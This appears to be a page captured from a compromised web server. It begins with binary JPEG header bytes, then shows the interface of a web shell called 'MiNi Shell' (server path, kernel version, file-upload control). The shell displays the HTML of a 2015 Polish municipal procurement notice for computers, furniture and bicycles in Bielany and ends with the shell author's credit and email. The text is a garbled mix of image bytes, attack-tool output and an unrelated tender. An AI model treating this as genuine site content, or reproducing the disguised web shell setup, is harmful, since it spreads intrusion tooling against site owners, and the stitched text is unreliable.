JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/9208-N-2015.html

<p class="kh_header"><b>Bielany: Dostawa wyposażenia do Multimedialnego Centrum Edukacji, Tradycji i Turystyki w wiosce Różnorodnych Kultur, w miejscowości Paczuski Duże, gmina Bielany</b><br>
<b>Numer ogłoszenia: 9208 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bielany , ul. Słoneczna 2, 08-311 Bielany, woj. mazowieckie, tel. 025 7878013 w. 24, faks 025 7878013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bipgminabielany.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.gminabielany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia do Multimedialnego Centrum Edukacji, Tradycji i Turystyki w wiosce Różnorodnych Kultur, w miejscowości Paczuski Duże, gmina Bielany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego:
1.Projektor multimedialny 1 szt.
Rozdzielczość min. 1024   768, kontrast min. 2500 :1. Przekątna ekranu wynosi min. od 1.53 m. Żywotność lampy w trybie normalnym min. 4500 godzin, a w trybie niskim min 6000 godzin i wysokim min. 3000 godzin. Wyposażony jest w głośnik o mocy min. 1 W i funkcję ręcznego ustawiania ostrości. Produkt posiada m.in. złącze S video, 2 x D sub, S video, złącze RS 232C i RJ 45. 
2.Uchwyt sufitowy do projektora 1szt.
UNIWERSALNY UCHWYT SUFITOWY PASUJĄCY DO WIĘKSZOSCI PROJEKTORÓW regulacja długości wysięgu min 116mm  max 398  572 mm. Pochylenie pionowe 10, Pozioma regulacja 360, pochylenie projektora na boki  10 
3.Drukarka laserowa 1 szt.
Wymagania minimalne 
Możliwość podłączenia do sieci Ethernet, opcja automatycznego drukowania dwustronnego.
 Szybkość druku w czerni: Tryb normalny: min. do 25 str. min 
 Jakość druku w czerni  tryb best   Do 600 x 600 dpi  efektywna rozdzielczość 1200 dpi z technologią FastRes 1200 
 Technologia druku Druk laserowy
 Szybkość procesora min.  400 MHz 
4.Laptop  3 szt.
Wymagania minimalne:
przekątna ekranu   min 15.6, 
rozdzielczość min 1920 1080,
taktowanie procesora: min 1600 MHz, 
zainstalowana pamięć RAM min 8 GB,
typ pamięci RAM  min DDR3, 
Dysk HDD   min Obr. 5400, 1 TB, 
napęd: DVD RW Super Multi, 
dźwięk  wbudowany mikrofon, głośniki  
urządzenie wskazujące: touchPad;
klawiatura   układ QWERTY, 
pamięć dwukanałowa min 2 4096, 
częstotliwość szyny pamięci: min 1600 MHz,
częstotliwość Turbo procesora min  3100 MHz;
pamięć karty graficznej: min; 2 GB, technologia LED, format obrazu 16 9, Full HD WUXGA,
technologie: Wi  Fi, Bluetooth, LED, USB 3.0, SATA, HDMI, wbudowana kamera.
karta sieciowa 10 100 1000
rodzaj USB min 4 3.0
wyjście HDMI, wyjście D Sub, wejście mikrofonowe, wyjście słuchawkowe;
czytnik kart 8 w 1;
system operacyjny: min; Windows 8 Professional 64 bit, Microsoft Office Trial Standard, McAfee SeciurityCenter 30 Days Trial,
wyposażenie: zasilacz oraz przewód
gwarancja  24 miesiące  12 miesięcy na baterie  lub według wskazań producenta. 
Część II  Dostawa i montaż mebli.
1.Krzesła do Sali widowiskowej  100 szt.
Krzesła wyprodukowane z wytrzymałego drewna, z tapicerowanym siedziskiem i oparciem. Oparcie profilowane.
Wymiary krzesła
wysokość: 96  99 cm
wysokość siedziska krzesła 45   48 cm
szerokość siedziska krzesła  40   44 cm
głębokość siedziska krzesła  40  43 cm
Wykonawca przed dostawą dostarczy wzornik materiałów.
2.Wieszak ubraniowy 1 szt.
Wieszak ubraniowy ze stali chromowanej i plastiku, regulowana wysokość jest dokonywana poprzez rozsunięcie górnych ramion wieszaka. Długość 80  88 cm, szerokość 75  83 cm, wysokość od 95 do 163 cm.
3.Lustro  1 szt.
Wymiary: wysokość: 50 cm, szerokość  100 cm
4.Biurko pod lustro 1 szt. 
wymiary biurka  długość  100 cm, szerokość  50 cm, wysokość   72,5 cm. 
Biurko powinno posiadać  4 szuflady.
5.Biurka do pracowni komputerowej  3 szt.
Biurka komputerowe wykonane z płyty mdf, niezbędne do zainstalowania stanowisk komputerowych w pracowni.
wymiary biurka: długość  min. 100 cm, szerokość: min. 65 cm, wysokość  min 72,5 cm. 
Biurko powinno posiadać  4 szuflady.
6.Krzesło biurowe obrotowe 3 szt.
Krzesło obrotowe posiadające stalowe podłokietniki z miękkimi, tapicerowanymi nakładkami, siedzisko wykonane z wytrzymałej tkaniny. Krzesło powinno posiadać mechanizm dający możliwość regulacji wysokości krzesła oraz siły oporu oparcia, a także blokady siedziska i oparcia w pozycji do pracy, pozwala na dostosowanie oporu do wagi użytkownika krzesła, zapewniając lepszy komfort siedzenia. Podstawa jezdna wykonana ze stali w kolorze chrom.
Wymiary  szerokość  min. 56 cm,  głębokość min. 41 cm, wysokość regulowana 87 95 cm.
7.Tapczan jednoosobowy 4 szt.
Tapczan jednoosobowy z pojemną skrzynia na pościel. Wsad sprężynowy. Podstawa z drewna i płyty. Tapicerka wykonana z mocnego materiału.
8. Szafa ubraniowa 1 szt. 
Szafa ubraniowa wykonana z płyty laminowanej. Wymiary: wysokość 172 cm, szerokość 80 cm, głębokość 41 cm. Parametry mogą odbiegać 10%.
9.Stolik do pomieszczenia noclegowego 1 szt. 
Stolik wykonany z płyty laminowanej o grubości min. 18 mm oklejona obrzeżem ABS o grubości 1 mm, Wymiary min.  szer. gł. wys. : 60 60 60 cm.
10.Krzesła do pomieszczenia noclegowego 4 szt. 
Krzesła wyprodukowane z wytrzymałego drewna, z tapicerowanym siedziskiem i oparciem. Oparcie profilowane.
Wymiary krzesła 
wysokość: 96  99 cm
wysokość siedziska krzesła  45   48 cm
szerokość siedziska krzesła  40   44 cm
głębokość siedziska krzesła  40   43 cm
Wykonawca przed dostawą dostarczy wzornik materiałów.
11.Zestaw kuchenny regał  do pomieszczenia do podgrzewania posiłków 1 kpl.
Regał kuchenny składający się z szafek wykonanych z płyty mdf. 
W skład zestawu wchodzą następujące elementy  
szafka dolna 40 cm
szafka dolna 80 cm
szafka dolna 80 cm pod zlewozmywak
szafka dolna 60 cm
szafka górna 40 cm
szafka górna 80 cm
witryna 80 cm
szafka górna 60 cm
Przed dostawę ze stawu kolorystykę należy uzgodnić z Zamawiającym.
12.Kuchnia mikrofalowa 1 szt.
Pojemność 20, funkcje podstawowe: gotowanie, podgrzewanie, rozmrażanie, moc 750 W, moc grilla  950 W
13.Czajnik elektryczny 1 szt.
Czajnik elektryczny do podgrzewania wody o pojemności min. 1,7 l. o mocy 2200W.
14.Stół do pomieszczenia do podgrzewania posiłków  1 szt.
Stół kuchenny wykonany z drewna o wymiarach min.; szerokość 80 cm, wysokość 76 cm, długość 120 cm.
15.Krzesła do pomieszczenia do podgrzewania posiłków  4 szt. 
Krzesła wyprodukowane z wytrzymałego drewna, z tapicerowanym siedziskiem i oparciem. Oparcie profilowane.
Wymiary krzesła 
wysokość  96  99 cm
wysokość siedziska krzesła  45  48 cm
szerokość siedziska krzesła  40   44 cm
głębokość siedziska krzesła  40   43 cm
Wykonawca przed dostawą dostarczy wzornik materiałów.
16.Wersalko-kanapa do sali integracja  2 szt.
Wykonana z mocnego materiału, powierzchnia po rozłożeniu wynosi min. 195 115, wymiar  wysokość min. 92 cm, szerokość min.  196 cm.
17.Ława do sali integracja 1 szt.
Ława wykonana z płyty laminowanej, minimalne parametry produktu 80 43 60.
Część III. Dostawa rowerów 5 szt. 
PARAMETRY 
KOŁO RAMA  26 , stalowa
ROZMIAR: 19 
WIDELEC: stalowy
HAMULCE V brake aluminiowe
OBRĘCZE  stalowe
OPONY: 26   1,75
KIEROWNICA: stalowa
WSPORNIK KIEROWNICY  stalowy
WSPORNIK SIODŁA  stalowy
PEDAŁY plastikowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.19.00.00-7, 39.11.20.00-0, 39.10.00.00-3, 34.43.00.00-0, 38.65.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent złoży oświadczenie w oparciu o art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent złoży oświadczenie w oparciu o art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent złoży oświadczenie w oparciu o art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent złoży oświadczenie w oparciu o art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent złoży oświadczenie w oparciu o art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wraz z załącznikami</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98.00</li>
<li>2 - Termin wykonania zamówienia - 2.00</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminabielany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bielany, ul. Słoneczna 2, 08-311 Bielany.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2015 godzina 09:00, miejsce: Urząd Gminy Bielany, ul. Słoneczna 2, 08-311 Bielany, pokój Nr 7 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach działania 413  Wdrażanie lokalnych strategii rozwoju  w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania  Odnowa i rozwój wsi  objętego PROW na lata 2007  - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com